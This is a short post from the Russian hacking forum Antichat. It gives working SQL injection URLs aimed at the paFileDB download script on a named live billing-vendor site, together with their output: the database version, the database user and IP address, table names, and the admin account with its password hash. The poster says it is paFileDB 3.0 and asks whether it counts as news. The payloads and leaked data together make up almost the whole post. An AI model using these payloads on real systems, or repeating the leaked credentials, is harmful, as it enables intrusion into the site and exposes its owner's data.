Форум АНТИЧАТ - Показать сообщение отдельно

www.lanbilling.ru
LANBilling биллинговая система

Код:

http://www.lanbilling.ru/filedownload/download.php?action=rate&id=-12'+UnIon+SeleCt+1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8/*

5.0.26:lbdownuser@84.16.130.34:lb_download

Код:

http://www.lanbilling.ru/filedownload/download.php?action=rate&id=-12'+UnIon+SeleCt+1,table_name,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8+from+information_schema.tables+limit+0,1/*

интересные таблицы(поля):
pafiledb_admin(admin_id,admin_username,admin_password,admin_emai l)
pafiledb_license(license_id,license_name,license_text)

1:Admin:f41b01afce262acf56b0f89b6c88b732

===============================
только что просмотрел исходник страницы оказывается это paFileDB 3.0. и на securitylab не нашёл инфы о такой иньекции,

это потянет на новость?)))
----------------
поставил последнюю версию paFileDB, фишка не работает, уже стоит intval()